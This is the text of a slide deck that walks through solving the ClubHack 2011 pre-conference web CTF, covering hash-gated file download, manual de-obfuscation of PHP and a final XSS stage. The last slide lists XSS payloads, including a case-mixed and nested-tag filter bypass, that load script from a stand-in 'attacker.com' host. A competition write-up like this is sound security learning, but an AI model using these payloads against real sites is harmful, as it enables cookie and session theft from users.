  • 3. Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
  • 4. ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
  • 5. Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
  • 6. Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
  • 7. Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
  • 8. Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
  • 9. Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
  • 10. Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
  • 11. Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
  • 12. Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
  • 13. Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
  • 14. Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
  • 15. Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
  • 16. Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
  • 17. Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
  • 18. Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4